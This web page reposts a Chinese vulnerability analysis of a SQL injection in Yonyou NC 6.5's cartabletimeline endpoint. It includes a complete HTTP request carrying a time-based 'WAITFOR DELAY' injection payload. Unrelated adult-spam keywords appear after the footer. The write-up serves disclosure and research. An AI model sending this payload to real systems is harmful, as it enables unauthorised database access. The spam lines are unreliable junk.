LOGO OA教程 ERP教程 模切知識交流 PMS教程 CRM教程 開發文檔 其他文檔  
 
網站管理員

用友NC 漏洞分析--cartabletimeline存在SQL注入

admin
2025年4月9日 0:6 本文熱度 1038

用友NC是一款大型erp企業管理系統與電子商務平臺;用友網絡科技股份有限公司用友NC存在SQL注入漏洞,攻擊者可利用該漏洞獲取數據庫敏感信息。                    


漏洞描述


   用友NC是一款大型erp企業管理系統與電子商務平臺。用友網絡科技股份有限公司用友NC存在SQL注入漏洞,攻擊者可利用該漏洞獲取數據庫敏感信息。 影響版本如下

用友NC6.5漏洞分析

VsmAction類中此處存在@Servlet注解,也就是說當訪問路徑為/cartabletimeline會直接定位到這里。

跟進getVehicleApplyInfo方法接口類ICarTalbeService,定義了getVehicleApplyInfo方法

找到接口類ICarTalbeService的實現類CarTableServiceImpl

跟進getgetUserVehicleApplyInfo方法

跟進queryVOs方法

漏洞復現(自測)

GET /portal/pt/cartabletimeline/doList?pageId=login&mtr=1)WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host: x.x.x.x:88
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: JSESSIONID=778E1EE003971592F31449220834A1AE.server
Priority: u=4



本文已2024-11-27

發布qax攻防社區:https://forum.butian.net/article/627

所以本文只做簡寫,可查看原文



閱讀原文:原文鏈接


該文章在 2025/4/9 12:03:36 編輯過
關鍵字查詢
相關文章
正在查詢...
點晴ERP是一款針對中小制造業的專業生產管理軟件系統,系統成熟度和易用性得到了國內大量中小企業的青睞。
點晴PMS碼頭管理系統主要針對港口碼頭集裝箱與散貨日常運作、調度、堆場、車隊、財務費用、相關報表等業務管理,結合碼頭的業務特點,圍繞調度、堆場作業而開發的。集技術的先進性、管理的有效性于一體,是物流碼頭及其他港口類企業的高效ERP管理信息系統。
點晴WMS倉儲管理系統提供了貨物產品管理,銷售管理,采購管理,倉儲管理,倉庫管理,保質期管理,貨位管理,庫位管理,生產管理,WMS管理系統,標簽打印,條形碼,二維碼管理,批號管理軟件。
點晴免費OA是一款軟件和通用服務都免費,不限功能、不限時間、不限用戶的免費OA協同辦公管理系統。
Copyright 2010-2025 ClickSun All Rights Reserved

黄频国产免费高清视频,久久不卡精品中文字幕一区,激情五月天AV电影在线观看,欧美国产韩国日本一区二区
亚洲va综合va国产产va中 | 亚洲成色999久久网站 | 亚洲精品一级Av在线播放 | 日本永久免费大片 | 中文字幕乱码在线视频网站 | 日韩专区日本一区 |